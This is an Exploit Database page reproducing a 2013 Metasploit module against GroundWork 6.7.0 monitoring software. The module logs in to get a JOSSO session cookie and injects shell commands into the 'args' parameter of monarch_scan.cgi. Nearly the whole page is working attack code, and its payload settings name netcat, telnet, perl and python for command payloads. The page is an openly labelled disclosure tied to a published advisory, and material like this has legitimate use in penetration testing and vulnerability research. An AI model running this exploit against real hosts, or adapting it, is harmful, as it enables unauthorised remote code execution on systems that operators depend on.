GroundWork – ‘monarch_scan.cgi’ OS Command Injection (Metasploit)

• Exploit Database
• 11 阅读

• 作者： Metasploit
  日期： 2013-04-25
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/25001/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] }
  
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info={})
  super(update_info(info,
  'Name' => "GroundWork monarch_scan.cgi OS Command Injection",
  'Description'=> %q{
  This module exploits a vulnerability found in GroundWork 6.7.0. This software
  is used for network, application and cloud monitoring. The vulnerability exists in
  the monarch_scan.cgi, where user controlled input is used in the perl qx function,
  which allows any remote authenticated attacker, whatever his privileges are, to
  inject system commands and gain arbitrary code execution. The module has been tested
  successfully on GroundWork 6.7.0-br287-gw1571 as distributed within the Ubuntu 10.04
  based VM appliance.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'Johannes Greil', # Vulnerability Discovery, PoC
  'juan vazquez'# Metasploit module
  ],
  'References' =>
  [
  [ 'OSVDB', '91051' ],
  [ 'US-CERT-VU', '345260' ],
  [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130308-0_GroundWork_Monitoring_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
  ],
  'Arch'=> ARCH_CMD,
  'Payload'=>
  {
  'Space' => 8190,
  'DisableNops' => true,
  'Compat'=>
  {
  'PayloadType' => 'cmd'
  },
  # Based on the default Ubuntu 10.04 VM appliance
  'RequiredCmd' => 'generic telnet netcat perl python'
  },
  'Platform' => ['unix', 'linux'],
  'Targets'=>
  [
  ['GroundWork 6.7.0', {}]
  ],
  'Privileged' => false,
  'DisclosureDate' => "Mar 8 2013",
  'DefaultTarget'=> 0))
  
  register_options(
  [
  OptString.new('USERNAME',[true, 'GroundWork Username', 'user']),
  OptString.new('PASSWORD',[true, 'GroundWork Password', 'user'])
  ], self.class)
  end
  
  def check
  res = send_request_cgi({
  'method' => 'GET',
  'uri'=> normalize_uri("josso", "signon", "login.do")
  })
  
  if res and res.body =~ /GroundWork.*6\.7\.0/
  return Exploit::CheckCode::Appears
  elsif res and res.body =~ /GroundWork/
  return Exploit::CheckCode::Detected
  else
  return Exploit::CheckCode::Safe
  end
  end
  
  def get_josso_token
  res = send_request_cgi({
  'method'=> 'POST',
  'uri' => normalize_uri("josso", "signon", "usernamePasswordLogin.do"),
  'vars_post' => {
  'josso_cmd'=> 'login',
  'josso_username' => datastore['USERNAME'],
  'josso_password' => datastore['PASSWORD']
  }
  })
  if res and res.headers['Set-Cookie'] =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/
  return $1
  else
  return nil
  end
  end
  
  def execute_command(command)
  http_handler = ((datastore['SSL']) ? "https" : "http")
  res = send_request_cgi({
  'method'=> 'GET',
  'uri' => normalize_uri("monarch", "monarch_scan.cgi"),
  'headers' =>
  {
  'Referer' => "#{http_handler}://#{rhost}/portal/auth/portal/groundwork-monitor/auto-disc"
  },
  'cookie'=> "JOSSO_SESSIONID=#{@josso_id}",
  'query' => "args=#{rand_text_alpha(3)}&args=#{rand_text_alpha(3)}&args=#{Rex::Text.uri_encode(command + ";")}"
  })
  return res
  end
  
  def exploit
  peer = "#{rhost}:#{rport}"
  
  print_status("#{peer} - Attempting to login...")
  @josso_id = get_josso_token
  if @josso_id.nil?
  fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to retrieve a JOSSO session ID")
  end
  print_good("#{peer} - Authentication successful")
  
  print_status("#{peer} - Sending malicious request...")
  execute_command(payload.encoded)
  end
  end